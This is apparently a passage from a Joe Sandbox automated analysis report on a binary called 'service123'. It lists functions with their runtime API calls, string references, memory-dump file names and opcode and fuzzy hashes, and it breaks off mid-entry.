Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 88af53d75b0bb30780252021aee76a28db907af3a22ac48536b6ea72194631eb
Instruction ID: 50fb4f5ec72ec88a73a7efbf1ff2f1e24aa153380328c7aa62e9fa59049d4b8a
Opcode Fuzzy Hash: 88af53d75b0bb30780252021aee76a28db907af3a22ac48536b6ea72194631eb
Instruction Fuzzy Hash: 84A16AB1A043188FCB00EF68C58469EBBF5FF89354F408969EC989B745D734E849CB92

Function 6C27B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C27997F), ref: 6C27B336
memcpy.MSVCRT(?,?,?,?,?,?,6C27997F), ref: 6C27B3A1
memcpy.MSVCRT(00000000,?,?,6C27997F), ref: 6C27B3E8

Strings

basic_string::assign, xrefs: 6C27B403

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: c327eb2f9a918cb92d97c221f5bcd0fdf0996c12c86c9dedafd8e1976320117f
Instruction ID: 111944b542b82ef33bff7672960da91a6a87d2f991bdaadaeb629db48a88afed
Opcode Fuzzy Hash: c327eb2f9a918cb92d97c221f5bcd0fdf0996c12c86c9dedafd8e1976320117f
Instruction Fuzzy Hash: 3751AC71B0A61A8FD720DF28C4D861EF7E1FF85319B50866DE8448BB14E770D845CBA2

Function 6C284410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C284471
memcpy.MSVCRT ref: 6C2844DF
memcpy.MSVCRT ref: 6C284518

Strings

basic_string::assign, xrefs: 6C284534

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 799992ba4ec007b45c65745328ac899c7357e86f0d3ea6bd3d9c7c945cc7a9ec
Instruction ID: ab8b523ad63b166ac72973558c9f5be13c3b4dd56b8f27d2cc912772015ac2cf
Opcode Fuzzy Hash: 799992ba4ec007b45c65745328ac899c7357e86f0d3ea6bd3d9c7c945cc7a9ec
Instruction Fuzzy Hash: 8951BF71B0B2168FD700DF28D09465EFBE9BF96319F51856DE8848B798E734D809CB82

Function 6C23E980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C23E9AA
wcslen.MSVCRT ref: 6C23EA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C23E9E2, 6C23EA52, 6C23EAC2

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 1eccd988b8df94e217607007b4e9b2f46c316d2dfa589d7e5b6cdce97dbf0434
Instruction ID: 370d6c68dbd678df2c3ed114bf1394db12ae33f3a754dd9821fe6d47ec34f262
Opcode Fuzzy Hash: 1eccd988b8df94e217607007b4e9b2f46c316d2dfa589d7e5b6cdce97dbf0434
Instruction Fuzzy Hash: 94417EF1A156188FCB00FF2CD48184AF7E0BB55218F564979EC898B715E231ED99CBD2

Function 6C23E581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C23E5AD
strlen.MSVCRT ref: 6C23E5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C23E5CF, 6C23E61F, 6C23E66F

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 915e2aa36cf4d3e3aa72bd5a0e408451f10486670d45968bd80c4ba8eabe8919
Instruction ID: 381591779e0687284b1c5da100ebad9784a14da06222085ba91bf911d9bf548b
Opcode Fuzzy Hash: 915e2aa36cf4d3e3aa72bd5a0e408451f10486670d45968bd80c4ba8eabe8919
Instruction Fuzzy Hash: EA3182F16153298FCB00BF28C48188ABBE4EF09618F46486DEC889B711D735DC59CB92

Function 006C7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 006C7C92
MultiByteToWideChar.KERNEL32 ref: 006C7CD5

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: cd875c3570975000a2e426b90f7390f76e1532cda590d1b44dbefa781ca708d6
Instruction ID: c1385657e28995259a6bc0f18b7236d565e769a938055e8aed1571f8973bda3f
Opcode Fuzzy Hash: cd875c3570975000a2e426b90f7390f76e1532cda590d1b44dbefa781ca708d6
Instruction Fuzzy Hash: 5031D1B05093418FD710DF29D588B6ABBF1BF85314F04895EE8958B350E7B6E849CF92

Function 6C229660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C2296B2
MultiByteToWideChar.KERNEL32 ref: 6C2296F5

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 1509ce53dc1275cc24278a6fbc09a0c234ae674c2fd87eb131236ebe2583dfcd
Instruction ID: f5a6f19205afd5d1cf2a9a201394a7c142bd0c2d4ac0a85f15eb468a7e6380a4
Opcode Fuzzy Hash: 1509ce53dc1275cc24278a6fbc09a0c234ae674c2fd87eb131236ebe2583dfcd
Instruction Fuzzy Hash: 603106B45093468FD700EF29E18464ABBF0BF86319F14891DF8D88B791D7BAD858CB52

Function 6C21F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C21F5C1

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: dd9421258cdee6782733bbe060e303495441f0c629853f48ad3414ab2f46d82c
Instruction ID: 71ef26505f5fea51d958e6d3cbf5ab21f705412e9cd86770ce0f47c9d3b2b084
Opcode Fuzzy Hash: dd9421258cdee6782733bbe060e303495441f0c629853f48ad3414ab2f46d82c
Instruction Fuzzy Hash: AA417870A09385CFDB60DF29D5887477BF4BB8A318F148218ED689BA90D734D546CBA2

Function 6C21F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C21F751

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 7ee64d3607440cb8f460dae466a56f16b8116c19ff74d8042d43169311f9df52
Instruction ID: a1969a4f97c839cdc2e4e8e2472f1dbaada8055b903188de26108ebcd523b242
Opcode Fuzzy Hash: 7ee64d3607440cb8f460dae466a56f16b8116c19ff74d8042d43169311f9df52
Instruction Fuzzy Hash: BC31AD70609345CFDB50DF29C6883433BF4BB46329F188219ED688BA80D739D406CF92

Function 6C21F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C21FA72
CreateSemaphoreW.KERNEL32 ref: 6C21FAB7
WaitForSingleObject.KERNEL32 ref: 6C21FB00

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 1aa440030860711e6c3872adb120a8ac9feb4df46e8d1bdb241332ed22eab3d3
Instruction ID: e808bd48ba0800ccb9c399c98cfd3477c0006bcc6b917cc21e4ada8f7040e49f
Opcode Fuzzy Hash: 1aa440030860711e6c3872adb120a8ac9feb4df46e8d1bdb241332ed22eab3d3
Instruction Fuzzy Hash: 4C314770609345CFCB60DF28C2883477BF4BB4A329F148218ED6C9B681D738D606CB92

Function 6C21FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C21FBF2
CreateSemaphoreW.KERNEL32 ref: 6C21FC37
WaitForSingleObject.KERNEL32 ref: 6C21FC80

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 3fa613800267a9a958bcac6ce59af525b1fc08522cbd7884f7372cf3eb75ce74
Instruction ID: 8bfeeee1f86d6755fb231a20202cad29677b1a875a64ed64986856a4906869f9
Opcode Fuzzy Hash: 3fa613800267a9a958bcac6ce59af525b1fc08522cbd7884f7372cf3eb75ce74
Instruction Fuzzy Hash: AB314870609345CFDB60DF29C2883077BF4BB4A369F048258ED6C8BA80C738D549DBA2

Function 6C2155A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2172FE

Strings

}, xrefs: 6C217392
{parm#, xrefs: 6C2172D9
this, xrefs: 6C2155B3

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 01819294db64697315abb9034433730d2edef5e2674ac5e35322af55cf9418ff
Instruction ID: e83b001d71dc758dcc513abfaba863aa6ab3cccd7a1d064602c65bd336f42da1
Opcode Fuzzy Hash: 01819294db64697315abb9034433730d2edef5e2674ac5e35322af55cf9418ff
Instruction Fuzzy Hash: FE21A17054D386CFD7018F18C0843A9BBE1AF96704F1885BEEDC84FE4AC77594858BA2

Function 006C1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 006C106B
__p__fmode.MSVCRT ref: 006C1070
__p__commode.MSVCRT ref: 006C107D

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 4e9dfd10030ed2c43d962faf092971ec3400e5234a9187e42db196dc6e77e2cb
Instruction ID: cfd5260f2884145d19ae891d78911c4f38c41e47622de106c368ea1d9c848acd
Opcode Fuzzy Hash: 4e9dfd10030ed2c43d962faf092971ec3400e5234a9187e42db196dc6e77e2cb
Instruction Fuzzy Hash: 00212070704241CAC310AF248845BB532A3FB03308F95856DC4598F266EB7AD8C69BA9

Function 6C289F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C289F85
strlen.MSVCRT ref: 6C289F8F
memcpy.MSVCRT ref: 6C289FB8
setlocale.MSVCRT ref: 6C289FCC

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 1ac07630643c2640c886f7717d77f6d9461d9de5a2cb7e6614c2ffff2bc52417
Instruction ID: c80bdbcbffdea585e54e46cb644a50f5b2dcea5e1f2dfd6cb73b7dbe91d34e67
Opcode Fuzzy Hash: 1ac07630643c2640c886f7717d77f6d9461d9de5a2cb7e6614c2ffff2bc52417
Instruction Fuzzy Hash: FAF034B15093199AE3007F6895463AFFAE4EF84788F418C1DE8D88B710E7788458CB92

Function 006C4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 006C4596
@, xrefs: 006C4647

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: d50a7732b28adbb8309b5087c45b8d6630571d49b08890080c662050ea6c18bb
Instruction ID: 83269ca1c7906f452a850e57bd8439e9366514a4ca95ed832bf480955e3167bc
Opcode Fuzzy Hash: d50a7732b28adbb8309b5087c45b8d6630571d49b08890080c662050ea6c18bb
Instruction Fuzzy Hash: AEA14D715083918BC721CF24C0A0BBABBE2FF85314F148A1DE8D997395DB35D94ADB82

Function 6C224C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C224C66
@, xrefs: 6C224D17

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 1e8979a356a2a4ca5f88a4c9e2e39196d0aa96a31f58f0f455cc9c9a9f685bd0
Instruction ID: a9cf86dc1a82749641e0d02f6227e0b1e07eba4231b5425ab9a2f801642419ec
Opcode Fuzzy Hash: 1e8979a356a2a4ca5f88a4c9e2e39196d0aa96a31f58f0f455cc9c9a9f685bd0
Instruction Fuzzy Hash: B8A19F7160C39A8BD720CF29C09079ABBE1BF85319F14862DECD84B785D778E549CB82

Function 006C4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 006C4DBE

Part of subcall function 006C2830: fputc.MSVCRT ref: 006C28F8

Strings

(null), xrefs: 006C4C27
@, xrefs: 006C4647

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 14b950320d9d91b761bdfffbd388e94c12a23f8c5e1c82b04fa347d7036f1eb0
Instruction ID: 1ba19e0c201547067a3e5edceb41d7e0f6b0fd916570e314f5756411fbaf75d1
Opcode Fuzzy Hash: 14b950320d9d91b761bdfffbd388e94c12a23f8c5e1c82b04fa347d7036f1eb0
Instruction Fuzzy Hash: 4A916E356083958BD721CF24C0A0BBABBE2FF85714F148A1DD8D997381DB35D946DB82

Function 6C2252F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C22548E

Part of subcall function 6C222F00: fputc.MSVCRT ref: 6C222FC8

Strings

(null), xrefs: 6C2252F7
@, xrefs: 6C224D17

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 4dd794f437967579f0ad94d85e68d338df4fbae10444f9c47872ecde6b0e8294
Instruction ID: 23f44fe1650306fe6278d88440edb0bf7a4e741ccaa252203fe21db7bd67bf28
Opcode Fuzzy Hash: 4dd794f437967579f0ad94d85e68d338df4fbae10444f9c47872ecde6b0e8294
Instruction Fuzzy Hash: 86919E7160C35A8BD721CE28C09079ABBE1BF85319F14862DECD88B785D779E509CB82

Function 6C2A5DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2A5DEA
wcslen.MSVCRT ref: 6C2A5E7C
wcslen.MSVCRT ref: 6C2A5F0E
strlen.MSVCRT ref: 6C2A5FA0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 17c3e9213899f1a0b7ccf5622ca251e75a4a658c3e7e14e7504c11640f3d4046
Instruction ID: 514cbe86dd02d933e6938529738ff3f82f71d53603ef763311572e1a4a32a57e
Opcode Fuzzy Hash: 17c3e9213899f1a0b7ccf5622ca251e75a4a658c3e7e14e7504c11640f3d4046
Instruction Fuzzy Hash: E9F13AB4A0560A8FC700DFACC4C49AEBBF1BF48314B114669EC55DB754E735E946CB81

Function 6C2A55D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2A560A
wcslen.MSVCRT ref: 6C2A569C
wcslen.MSVCRT ref: 6C2A572E
strlen.MSVCRT ref: 6C2A57C0

Memory Dump Source

